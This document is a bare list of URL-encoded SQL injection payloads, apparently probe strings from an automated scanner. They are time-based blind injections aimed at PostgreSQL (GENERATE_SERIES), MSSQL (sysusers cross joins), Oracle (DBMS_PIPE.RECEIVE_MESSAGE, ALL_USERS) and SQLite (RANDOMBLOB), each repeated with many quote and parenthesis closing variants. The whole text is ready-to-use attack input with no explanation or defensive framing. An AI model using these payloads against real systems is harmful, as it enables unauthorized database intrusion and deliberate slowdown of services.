-8714%27%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27FLLh%27%20LIKE%20%27FLLh -2071%27%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27bRpz%27%20LIKE%20%27bRpz -8548%27%29%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27MfnX%27%20LIKE%20%27MfnX -5090%27%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27tREr%27%20LIKE%20%27tREr -7878%22%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22BsjG%22%3D%22BsjG -7566%22%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22yMDI%22%3D%22yMDI -6764%22%29%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22uBKY%22%3D%22uBKY -4401%22%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22mvlU%22%3D%22mvlU -8942%22%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22zOeM%22%20LIKE%20%22zOeM -8485%22%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22nFhi%22%20LIKE%20%22nFhi -3016%22%29%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22LdDa%22%20LIKE%20%22LdDa -2760%22%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22MuqL%22%20LIKE%20%22MuqL -2895%29%20WHERE%205184%3D5184%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -1879%27%29%20WHERE%207217%3D7217%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -8667%27%20WHERE%207193%3D7193%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -5752%22%20WHERE%206156%3D6156%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -5177%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -1467%27%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -1460%27%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -5013%22%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -4418%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%285783%3D5783 -7366%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%281608%3D1608 -7285%29%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%285336%3D5336 -2731%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -6581%27%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27ZEpE%27%3D%27ZEpE -6719%27%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27TApP%27%3D%27TApP -6215%27%29%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27nFwP%27%3D%27nFwP -7383%27%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27jqnJ%27%3D%27jqnJ -2572%27%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27GRLT%27%20LIKE%20%27GRLT -9421%27%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27mqvh%27%20LIKE%20%27mqvh -9368%27%29%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27rIEH%27%20LIKE%20%27rIEH -8720%27%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27ToQT%27%20LIKE%20%27ToQT -9869%22%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22iAiu%22%3D%22iAiu -8627%22%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22ySWq%22%3D%22ySWq -4368%22%29%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22fYft%22%3D%22fYft -5418%22%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22ippj%22%3D%22ippj -3717%22%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22zXPH%22%20LIKE%20%22zXPH -8853%22%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22OpjW%22%20LIKE%20%22OpjW -9956%22%29%29%29%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22FZAS%22%20LIKE%20%22FZAS -6091%22%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22dwsM%22%20LIKE%20%22dwsM -2528%29%20WHERE%209521%3D9521%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -3894%27%29%20WHERE%209305%3D9305%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -2888%27%20WHERE%203469%3D3469%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -8000%22%20WHERE%206886%3D6886%20OR%203906%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -6373%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29 -4395%27%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29 -6465%27%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29 -6947%22%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29 -1623%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%288417%3D8417 -4346%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%287519%3D7519 -6863%29%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%28%285841%3D5841 -7001%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29 -4599%27%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%27mBJQ%27%3D%27mBJQ -5078%27%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%28%27PbWw%27%3D%27PbWw -6983%27%29%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%28%28%27MBGr%27%3D%27MBGr -9284%27%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%27xkjM%27%3D%27xkjM -7430%27%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%27csVb%27%20LIKE%20%27csVb -6954%27%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%28%27liJl%27%20LIKE%20%27liJl -8291%27%29%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%28%28%27kZSk%27%20LIKE%20%27kZSk -2849%27%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%27kFgE%27%20LIKE%20%27kFgE -5573%22%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%22jdWP%22%3D%22jdWP -3615%22%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%28%22uNIi%22%3D%22uNIi -6249%22%29%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%28%28%22GSyx%22%3D%22GSyx -1766%22%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%22ktrP%22%3D%22ktrP -5071%22%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%22SCLX%22%20LIKE%20%22SCLX -1208%22%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%28%22mnrw%22%20LIKE%20%22mnrw -8476%22%29%29%29%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%28%28%28%22XlZs%22%20LIKE%20%22XlZs -8068%22%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29%20AND%20%22ORzp%22%20LIKE%20%22ORzp -9765%29%20WHERE%202597%3D2597%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29 -4107%27%29%20WHERE%207448%3D7448%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29 -7694%27%20WHERE%201963%3D1963%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29 -5637%22%20WHERE%202742%3D2742%20OR%207216%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28120%29%2C5%29 -6396%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -2460%27%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -5079%27%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -5989%22%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -8312%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%287709%3D7709 -6547%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%287628%3D7628 -1694%29%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%289937%3D9937 -1133%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -6170%27%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27QMQX%27%3D%27QMQX -6437%27%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27tnVF%27%3D%27tnVF -3800%27%29%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27VUOV%27%3D%27VUOV -5967%27%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27NDgH%27%3D%27NDgH -6776%27%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27dANk%27%20LIKE%20%27dANk -3967%27%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27XyXK%27%20LIKE%20%27XyXK -9191%27%29%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27PjfL%27%20LIKE%20%27PjfL -8615%27%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27hNDn%27%20LIKE%20%27hNDn -6615%22%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22HbHA%22%3D%22HbHA -1507%22%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22ItHP%22%3D%22ItHP -2281%22%29%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22UJBk%22%3D%22UJBk -5059%22%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22DxIJ%22%3D%22DxIJ -3287%22%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22ihIa%22%20LIKE%20%22ihIa -3691%22%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22kucz%22%20LIKE%20%22kucz -9075%22%29%29%29%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22MBES%22%20LIKE%20%22MBES -1808%22%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22mXsC%22%20LIKE%20%22mXsC -9555%29%20WHERE%205642%3D5642%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -5098%27%29%20WHERE%203087%3D3087%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -7652%27%20WHERE%203356%3D3356%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -8572%22%20WHERE%202400%3D2400%20OR%204008%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -2549%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -3999%27%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -6539%27%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -3009%22%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -4098%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%284850%3D4850 -8514%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%285572%3D5572 -2055%29%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%282544%3D2544 -2428%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -5639%27%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27UCVQ%27%3D%27UCVQ -2787%27%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27vwvM%27%3D%27vwvM -8691%27%29%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27BrDl%27%3D%27BrDl -6142%27%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27FUxd%27%3D%27FUxd -8999%27%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27RyOy%27%20LIKE%20%27RyOy -8788%27%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27OtGn%27%20LIKE%20%27OtGn -1681%27%29%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27XyfN%27%20LIKE%20%27XyfN -9840%27%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27kIHp%27%20LIKE%20%27kIHp -7880%22%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22QVuk%22%3D%22QVuk -8973%22%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22qnMA%22%3D%22qnMA -7554%22%29%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22ddEl%22%3D%22ddEl -7811%22%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22wufC%22%3D%22wufC 